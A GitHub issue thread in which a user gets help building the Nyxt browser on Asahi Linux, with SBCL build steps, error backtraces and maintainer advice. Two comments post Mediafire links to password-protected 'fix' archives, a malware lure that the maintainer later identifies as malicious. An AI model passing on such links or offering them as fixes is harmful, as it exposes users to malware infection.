### ISSUE TITLE
Help for Building on Asahi Linux

### ISSUE THREAD

**Issue by arcxne** [atlas-engineer/nyxt#3482]
Hey there, I'm super excited to try this browser but am struggling to build this on Asahi Linux. If there's a guide somewhere, that'd be great!

I am using Fedora Asahi Remix 40 on M1 Pro.

I've trying building directly from source but I constantly get issues, with my current one being "history-tree" not found.

Sorry if I'm doing anything wrong, I have no idea what's happening and have been using ChatGPT to help me! Any help will be appreciated :)

## Here were my steps:
```bash
git clone <repo_name>
cd nyxt
git submodule update --init --recursive     # realised that I forgot to include submodules...
vi ~/.sbclrc (see ~/.sbclrc below)
sbcl
* (require 'asdf)
* (asdf:load-asd "/home/fedora/libraries/nasdf/nasdf.asd")
* (asdf:load-asd "/home/fedora/nyxt/nyxt.asd")
* (dolist (dep '(alexandria                 # all yanked from the nyxt.asd file
               bordeaux-threads
               calispel
               cl-base64
               cl-colors2
               cl-gopher
               cl-json
               cl-ppcre
               cl-ppcre-unicode
               cl-prevalence
               cl-qrencode
               cl-tld
               closer-mop
               dissect
               moptilities
               dexador
               enchant
               flexi-streams
               history-tree
               iolib
               iolib/os
               lass
               local-time
               lparallel
               log4cl
               ndebug
               nclasses
               nfiles
               njson/cl-json
               nhooks
               nkeymaps
               nsymbols/star
               #-sbcl osicat
               parenscript
               prompter
               py-configparser
               quri
               serapeum
               str
               phos
               plump
               clss
               spinneret
               slynk
               slynk/arglists
               slynk/fancy-inspector
               slynk/indentation
               slynk/mrepl
               slynk/package-fu
               slynk/stickers
               slynk/trace-dialog
               sqlite
               swank
               swank/exts
               trivia
               trivial-clipboard
               trivial-features
               trivial-garbage
               trivial-package-local-nicknames
               trivial-types
               unix-opts))
  (ql:quickload dep))
* (asdf:make :nyxt/gi-gtk-application)
```

Error:
```bash
debugger invoked on a ASDF/FIND-COMPONENT:MISSING-DEPENDENCY in thread
#<THREAD tid=21640 "main thread" RUNNING {10053C04C3}>:
  Component ASDF/USER::HISTORY-TREE not found, required by
  #<NASDF-SYSTEM "nyxt">
```

~/.sbclrc:
```bash
#-quicklisp
(let ((quicklisp-init (merge-pathnames "quicklisp/setup.lisp"
                                       (user-homedir-pathname))))
  (when (probe-file quicklisp-init)
    (load quicklisp-init)))

#-quicklisp
(let ((quicklisp-init (merge-pathnames "quicklisp/setup.lisp"
                                       (user-homedir-pathname))))
  (when (probe-file quicklisp-init)
    (load quicklisp-init)))

(require 'asdf)
(push (merge-pathnames "quicklisp/" (user-homedir-pathname)) asdf:*central-registry*)
```

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by arcxne** [comment]
Sorry but I am a bit wary of the downloading random files online... may I know where this came from?

**Comment by aadcg** [comment]
@arcxne see file `INSTALL`.

Assuming that you fetched the git submodules at `_build`, just call `make all`. Does that help?

I'm curious whether you're able to run Nyxt on that hardware via Asahi Linux.

-----------

Replies that you got (now deleted by Github, I assume) are malicious attacks.

**Comment by arcxne** [comment]
@aadcg I have tried to multiple times but I always get errors. Just ran it again and got a new error

```bash
gcc: fatal error: cannot read spec file ‘/usr/lib/rpm/redhat/redhat-hardened-cc1’: No such file or directory
compilation terminated.
Unhandled CFFI-GROVEL:GROVEL-ERROR in thread #<error printing a SB-THREAD:THREAD: #<PRINT-NOT-READABLE {100FA33AF3}>>: Subprocess #<UIOP/LAUNCH-PROGRAM::PROCESS-INFO {100FA310A3}>
 with command ("gcc" "-o" "/home/fedora/.cache/common-lisp/sbcl-2.3.11-2.fc40-linux-arm64/home/fedora/nyxt/_build/iolib/src/syscalls/ffi-types-unix__grovel-tmp4OLR0J6X.o" "-c" "-O2" "-flto=auto" "-ffat-lto-objects" "-fexceptions" "-g" "-grecord-gcc-switches" "-pipe" "-Wall" "-Werror=format-security" "-Wp,-U_FORTIFY_SOURCE,-D_FORTIFY_SOURCE=3" "-Wp,-D_GLIBCXX_ASSERTIONS" "-specs=/usr/lib/rpm/redhat/redhat-hardened-cc1" "-fstack-protector-strong" "-specs=/usr/lib/rpm/redhat/redhat-annobin-cc1" "-mbranch-protection=standard" "-fasynchronous-unwind-tables" "-fstack-clash-protection" "-fno-omit-frame-pointer" "-mno-omit-leaf-frame-pointer" "-std=gnu99" "-fno-pie" "-D_XOPEN_SOURCE=600" "-D_GNU_SOURCE=1" "-fPIC" "-I/home/fedora/nyxt/_build/cffi/" "/home/fedora/.cache/common-lisp/sbcl-2.3.11-2.fc40-linux-arm64/home/fedora/nyxt/_build/iolib/src/syscalls/ffi-types-unix__grovel.c")
 exited with error code 1

Backtrace for: #<SB-THREAD:THREAD tid=26784 "main thread" RUNNING {1001E90313}>
0: (SB-DEBUG::DEBUGGER-DISABLED-HOOK #<CFFI-GROVEL:GROVEL-ERROR "~a" {100FA328E3}> #<unused argument> :QUIT T)
1: (SB-DEBUG::RUN-HOOK *INVOKE-DEBUGGER-HOOK* #<CFFI-GROVEL:GROVEL-ERROR "~a" {100FA328E3}>)
2: (INVOKE-DEBUGGER #<CFFI-GROVEL:GROVEL-ERROR "~a" {100FA328E3}>)
3: (ERROR CFFI-GROVEL:GROVEL-ERROR :FORMAT-CONTROL "~a" :FORMAT-ARGUMENTS (#<UIOP/RUN-PROGRAM:SUBPROCESS-ERROR {100FA32343}>))
4: (CFFI-GROVEL:GROVEL-ERROR "~a" #<UIOP/RUN-PROGRAM:SUBPROCESS-ERROR {100FA32343}>)
5: ((FLET "THUNK" :IN CFFI-GROVEL:PROCESS-GROVEL-FILE))
6: (SB-IMPL::%WITH-STANDARD-IO-SYNTAX #<FUNCTION (FLET "THUNK" :IN CFFI-GROVEL:PROCESS-GROVEL-FILE) {FFFF7FD7187B}>)
7: (CFFI-GROVEL:PROCESS-GROVEL-FILE #P"/home/fedora/nyxt/_build/iolib/src/syscalls/ffi-types-unix.lisp" #P"/home/fedora/.cache/common-lisp/sbcl-2.3.11-2.fc40-linux-arm64/home/fedora/nyxt/_build/iolib/src/syscalls/ffi-types-unix.processed-grovel-file")
8: ((:METHOD ASDF/ACTION:PERFORM (CFFI-GROVEL::PROCESS-OP CFFI-GROVEL:GROVEL-FILE)) #<CFFI-GROVEL::PROCESS-OP > #<CFFI-GROVEL:GROVEL-FILE "iolib/syscalls" "ffi-types">) [fast-method]
9: ((SB-PCL::EMF ASDF/ACTION:PERFORM) #<unused argument> #<unused argument> #<CFFI-GROVEL::PROCESS-OP > #<CFFI-GROVEL:GROVEL-FILE "iolib/syscalls" "ffi-types">)
10: ((LAMBDA NIL :IN ASDF/ACTION:CALL-WHILE-VISITING-ACTION))
11: ((:METHOD ASDF/ACTION:PERFORM :AROUND (CFFI-GROVEL::PROCESS-OP CFFI-GROVEL::CC-FLAGS-MIXIN)) #<CFFI-GROVEL::PROCESS-OP > #<CFFI-GROVEL:GROVEL-FILE "iolib/syscalls" "ffi-types">) [fast-method]
12: ((:METHOD ASDF/ACTION:PERFORM-WITH-RESTARTS :AROUND (T T)) #<CFFI-GROVEL::PROCESS-OP > #<CFFI-GROVEL:GROVEL-FILE "iolib/syscalls" "ffi-types">) [fast-method]
13: ((:METHOD ASDF/PLAN:PERFORM-PLAN (T)) #<ASDF/PLAN:SEQUENTIAL-PLAN {1001EA0373}>) [fast-method]
14: ((FLET SB-C::WITH-IT :IN SB-C::%WITH-COMPILATION-UNIT))
15: ((:METHOD ASDF/PLAN:PERFORM-PLAN :AROUND (T)) #<ASDF/PLAN:SEQUENTIAL-PLAN {1001EA0373}>) [fast-method]
16: ((:METHOD ASDF/OPERATE:OPERATE (ASDF/OPERATION:OPERATION ASDF/COMPONENT:COMPONENT)) #<ASDF/LISP-ACTION:LOAD-OP > #<NASDF:NASDF-SYSTEM "nyxt/gi-gtk-application"> :PLAN-CLASS NIL :PLAN-OPTIONS NIL) [fast-method]
17: ((SB-PCL::EMF ASDF/OPERATE:OPERATE) #<unused argument> #<unused argument> #<ASDF/LISP-ACTION:LOAD-OP > #<NASDF:NASDF-SYSTEM "nyxt/gi-gtk-application">)
18: ((LAMBDA NIL :IN ASDF/OPERATE:OPERATE))
19: ((:METHOD ASDF/OPERATE:OPERATE :AROUND (T T)) #<ASDF/LISP-ACTION:LOAD-OP > #<NASDF:NASDF-SYSTEM "nyxt/gi-gtk-application">) [fast-method]
20: ((SB-PCL::EMF ASDF/OPERATE:OPERATE) #<unused argument> #<unused argument> ASDF/LISP-ACTION:LOAD-OP :NYXT/GI-GTK-APPLICATION)
21: ((LAMBDA NIL :IN ASDF/OPERATE:OPERATE))
22: ((:METHOD ASDF/OPERATE:OPERATE :AROUND (T T)) ASDF/LISP-ACTION:LOAD-OP :NYXT/GI-GTK-APPLICATION) [fast-method]
23: (ASDF/SESSION:CALL-WITH-ASDF-SESSION #<FUNCTION (LAMBDA NIL :IN ASDF/OPERATE:OPERATE) {1001EA01CB}> :OVERRIDE T :KEY NIL :OVERRIDE-CACHE T :OVERRIDE-FORCING NIL)
24: ((LAMBDA NIL :IN ASDF/OPERATE:OPERATE))
25: (ASDF/SESSION:CALL-WITH-ASDF-SESSION #<FUNCTION (LAMBDA NIL :IN ASDF/OPERATE:OPERATE) {1001EA00FB}> :OVERRIDE NIL :KEY NIL :OVERRIDE-CACHE NIL :OVERRIDE-FORCING NIL)
26: ((:METHOD ASDF/OPERATE:OPERATE :AROUND (T T)) ASDF/LISP-ACTION:LOAD-OP :NYXT/GI-GTK-APPLICATION) [fast-method]
27: (ASDF/OPERATE:LOAD-SYSTEM :NYXT/GI-GTK-APPLICATION)
28: (SB-INT:SIMPLE-EVAL-IN-LEXENV (ASDF/OPERATE:LOAD-SYSTEM :NYXT/GI-GTK-APPLICATION) #<NULL-LEXENV>)
29: (EVAL (ASDF/OPERATE:LOAD-SYSTEM :NYXT/GI-GTK-APPLICATION))
30: (SB-IMPL::PROCESS-EVAL/LOAD-OPTIONS ((:EVAL . "(require \"asdf\")") (:EVAL . "(asdf:load-asd \"/home/fedora/nyxt//libraries/nasdf/nasdf.asd\")") (:EVAL . "(asdf:load-asd \"/home/fedora/nyxt//nyxt.asd\")") (:EVAL . "(asdf:load-system :nyxt/gi-gtk-application)") (:EVAL . "(asdf:make :nyxt/gi-gtk-application)") (:EVAL . "(uiop:quit)") (:QUIT)))
31: (SB-IMPL::TOPLEVEL-INIT)
32: ((FLET SB-UNIX::BODY :IN SB-IMPL::START-LISP))
33: ((FLET "WITHOUT-INTERRUPTS-BODY-3" :IN SB-IMPL::START-LISP))
34: (SB-IMPL::%START-LISP)

unhandled condition in --disable-debugger mode, quitting
; 
; compilation unit aborted
;   caught 1 fatal ERROR condition
;   caught 25 STYLE-WARNING conditions
;   printed 4325 notes

Compilation failed, see the above stacktrace.

make: *** [makefile:47: nyxt] Error 1
```
---

Oh my, I had nearly downloaded the malware! Thank goodness I was wary enough! Those accounts really looked legit...

**Comment by aadcg** [comment]
@arcxne That's odd. If you take a look at the makefile you'll see that it sets `CL_SOURCE_REGISTRY` so that the git submodules (pointing to the CL libraries) take priority. 

Are that folder under `_build` populated? For instance, does `_build/alexandria/alexandria.asd` exist?

Note that using Quicklisp or using your own library versions isn't encouraged or supported, but you're free to build as you wish of course.

**Comment by arcxne** [comment]
It seems that all the folders existed but were not populated...

I tried a fresh install for the 4th time and it worked this time! I think in my 2nd attempt (this issue was my 3rd), I had done exactly as you said, but `make install` wasn't working because I needed to add a `sudo` behind it (I don't think INSTALL mentions this?), so I was messing around with the files and eventually just wiped it all.

Thank you so much for your help and patience! I am super excited to try using it on a regular basis! All the best for the future of nyxt :)
